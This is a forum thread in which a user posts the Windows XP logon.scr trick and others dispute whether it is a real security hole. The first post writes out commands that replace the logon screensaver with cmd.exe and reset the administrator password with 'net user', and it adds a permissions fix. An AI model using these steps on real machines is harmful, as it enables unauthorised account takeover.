Another logon.scr Admin Hole + FIX
Page 1 of 2 12 LastLast
Results 1 to 10 of 18

Thread: Another logon.scr Admin Hole + FIX

  1. #1

    Another logon.scr Admin Hole + FIX

    WOW windows sux.... Lol so many logon holes. Here is another.
    I Belive that this is only for XP
    I also belive that this a very well know hole but i decided to post it for the people who have never heard of it.

    How it works.
    When your PC on a logon screen and nothing is done for 10-15 minutes a LOGON SCREENSAVER is executed. What can happen is a user can replace that LOGON SCREENSAVER with the DOS PROMPT. What this will do is instead of running the screensave it will display the command prompt. Through the prompt they can easily change the ADMIN password and logon under that name.

    HOW IT IS DONE
    RUN>>COMMAND
    C:\> cd \winnt\system32
    C:\winnt\system32> copy logon.scr logon.scr.old
    C:\winnt\system32> del logon.scr
    C:\winnt\system32> copy cmd.exe logon.scr

    Now all they would have to do is logoff the machine, wait 10-15 minutes then the DOS PROMPT should execute.
    Lastly all they have to do is type "C:\> net user administrator <newpassword> " in the prompt and log in with the new account.

    *FIX* change default permissions on C:\winnt and C:\winnt\system32 you should be golden.

  2. #2
    Senior Member
    Join Date
    Jan 2002
    Posts
    1,207
    Firstly old news,
    Secondly it isn't a security hole.

    In order to replace logon.scr, you require admin rights, because the default ACL in Windows NT (And 2000, XP etc) only allows administrators and system write access.
    If you had admin rights, then you can obtain localsystem privileges easily anyway.

    So it just isn't an issue.

    Unless you're using fat32. If that is the case however, there are probably easier ways of getting localsystem rights.

    Slarty

  3. #3
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,190
    Szafran,

    With the greatest respect, windows does not suck!

    The truth is that the Earth sucks, and that gravity is a myth...........

    All operating systems have their flaws, but the worst flaws must be in the humans who find and exploit them?

    I guess if you can guarantee 5 minutes, either physical or firewall security should have caught it?

    That is where I feel that your security lies...you can only buy time...just like security on an automobile?

    just my 0.02 worth

  4. #4
    lol, i didn't mean it like that, sorry, i meant its so much more unsecure then linux. And the reason i posted is was because at my school you do not need ADMIN right to change files such as LOGON.SCR if you boot with a floppy.

    so in response to
    Firstly old news,
    Secondly it isn't a security hole.
    It may not be new but it is still a a security hole. And incase you missed my last message. If they boot with a floppy or CD in DOS then is it very possible to alter any file in the windows DIR includeing LOGON.SCR.

    PS thanx for the NEG Points

  5. #5
    Banned
    Join Date
    May 2003
    Posts
    1,004
    lol, i didn't mean it like that, sorry, i meant its so much more unsecure then linux.
    Just stop talking before I really start to flame you.

    I have read a few of your posts now and it is obvious that you are quite new to computers and computer security, so if you'd like to be welcome here I think you would do better _asking_ and not telling.

    catch

  6. #6
    actually i'm quite fluent in computers but my posts and been written so that the least fluent user can understand.

    and just to let everyone know i just triend this on my other PC and it did work w/ a boot disk. So unless you have bootdisk disabeled then you might want to look into this.

  7. #7
    Banned
    Join Date
    May 2003
    Posts
    1,004
    You other post about any user being able to change the admin password belays your level of fluency.

    As for this one, if the system is improperly protected against alternate boots, this screen saver crap is the least of your worries.

    catch

  8. #8
    well the admin pass can be easilt changed with the NET USER Command

  9. #9
    Banned
    Join Date
    Jul 2002
    Posts
    877
    Originally posted here by Szafran
    lol, i didn't mean it like that, sorry, i meant its so much more unsecure then linux.
    I have no problem with your personal feelings towards windows and M$... But with this post however... actually your wrong esspecially considering probably about half of the windows users out there are home users and there are many who know very little or nothing at all about their own computers. One of the main reasons its such a popular target is because its so wide spread. Also what many peaple don't realize is linux may not be the bigest target when it comes to virii but what it lacks in that it makes up for with a fair share of exploits...

    Originally posted here by Szafran
    my posts and been written so that the least fluent user can understand.
    Is that a insult or just more excuses on your part?

  10. #10
    Senior Member
    Join Date
    Jan 2002
    Posts
    1,207
    It may not be new but it is still a a security hole.
    No it is not.

    And incase you missed my last message. If they boot with a floppy or CD in DOS then is it very possible to alter any file in the windows DIR includeing LOGON.SCR.
    No, DOS does not understand NTFS, hence will not be able to see the NT partition at all. If you use FAT the system is inherently insecure, AS MICROSOFT FREELY ADMIT and thus don't recommend you use FAT on your system drive.

    Of course if you can boot off a CD or floppy full access is easily obtainable anyway, but I won't tell you how because you're a lamer.

    PS thanx for the NEG Points
    If you want to post up inaccurate duplicate out of date info, you should expect more

    Slarty

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •